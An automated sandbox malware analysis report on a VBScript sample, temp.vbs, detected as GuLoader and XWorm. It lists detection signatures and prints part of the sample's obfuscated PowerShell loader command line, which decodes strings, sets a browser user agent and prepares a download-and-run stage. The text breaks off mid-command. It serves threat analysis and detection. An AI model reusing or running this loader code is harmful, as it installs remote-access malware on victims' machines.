Windows
Analysis Report
temp.vbs
Overview
General Information
Detection
GuLoader, XWorm
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2620 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\temp. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 4788 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Autarkic ally189 = 1;$Indgang ssignaletn struktions bger='Sub' ;$Indgangs signaletns truktionsb ger+='stri n';$Indgan gssignalet nstruktion sbger+='g' ;Function Quadmeter( $Dopingsig tet){$Dump eprocenter =$Dopingsi gtet.Lengt h-$Autarki cally189;F or($Indgan gssignalet =5;$Indgan gssignalet -lt $Dump eprocenter ;$Indgangs signalet+= 6){$Forlys +=$Dopings igtet.$Ind gangssigna letnstrukt ionsbger.I nvoke( $In dgangssign alet, $Aut arkically1 89);}$Forl ys;}functi on Flaprer ($Caissone d){& ( $Sopites) ($Caissone d);}$Gener alisternes =Quadmeter 'PylorM e dto ,ildzI raeiMa oe l Uerhl Fa lsahejka/T imia5 L ft .Gar,e0And ro K,rre(M .ckeW,evaa iSvinenAnt i.dLandgo FluewSkalk sgarnn Ora clNJaponTY oudi Gr,ni 1Codd 0Und e,.S ick0T ilkr;Event BistW joi niContrn . chw6 Hrin4 S,vsu;Hapt e Seg exRe nde6Gaine4 Prebl;J.mp s Pu prBol igv Fort: Edu.1 Hete 2 cure1Vom me.Mona.0A .pel)Omber Vra.tG Tr afe Her.cG ,laxkMonis oHensl/Uns ea2Foeta0D ekup1Wares 0 udpl0Red es1Bepow0M uted1slapp .raktFPla itiFuskerK entoe Ba,r f Tra,oUtr ovxvedes/ Anda1Utilf 2 Damp1 Tr id.Bus,i0I lixa ';$Li feblood=Qu admeter 'F olkeUCroo s merceBes tyrSulmu-K limaAGul b gAnecdeSlu t,nProtot luma ';$Po stfrontal= Quadmeter 'Ca dihVaa betD llat. unktpSf.rb s Ndve:Hjl an/Broo / rickrCatki acors,nOve rlcT,enehP atruoT,lde bSupero Po l.sFrembcD ickeaLecit r Sv.ndLat heiStyktnF ilmo.Sweep cshaveo S pemCapit.P ollybKulbr rSvend/Me. alcSk,ttsN asc /Hupa. RUnex rEna ngk refonT as eo Juge g HanelEva ,geIgnitrP ntenF,rdr eForst.A g otaKinetsA kkordBrug, ';$Uninno cuous=Quad meter 'Kun dg>Provi ' ;$Sopites= Quadmeter ',ablei Re alePrespxT e,ef ';$So rteringsmu lighederne ='Exclusio n';$Opkald sprisen = Quadmeter 'Se.areNot eacoprejhJ ovasoLeann Bem r%Bio feaD strp Stutp Kvie dDin oa Ku rit Unscam an,e% Kono \OluffATra f k AareeU ndernIsopy b ,kikocer erlUnderdT indi.Missi uS,ilnd ,n ntf Enta p os r&Plasm & Proc M,r ateO erpcP rotohUnmee od zzi Hre s.tHavmi ' ;Flaprer ( Quadmeter ' Blus$Urg eng GerulF ryseo Lemp b FrdiaLs lulAn gg:S ta,sMBras, aScombrDoe dsi JuleaY ndlin acro e Udso=Dru kk(Kolp,cW ap,emTomat dTr.ll Unr is/Ch ckc Exto Visib $Un erOmag ,rpLinjekE ntraaOverf l ,hardFul nes rtepCo desrRe rni BeloesTerr aeXylopnBr .es)Sikke ');Flaprer (Quadmete r 'Beund$O phiug Bapt lFissio O dlbUdfaka. ordblWangl : EmbiSVet kotStnkso. rimeoPelle nmediz= Rv er$ MetoPP roteo Park s EmantIoa nnfunsierC .nfioRo er nSkotjtBis tiaKlimalO rico. Bisi s nhidp Op bel frigi StiltScamb ( tale$Ins ecUAlternK napbiUltra n urunnRef rao e accR d.hau Inal oGoo,euSag itsArbut)S ickl ');$P ostfrontal =$Stoon[0] ;$prespakk et= (Quadm eter 'Bleg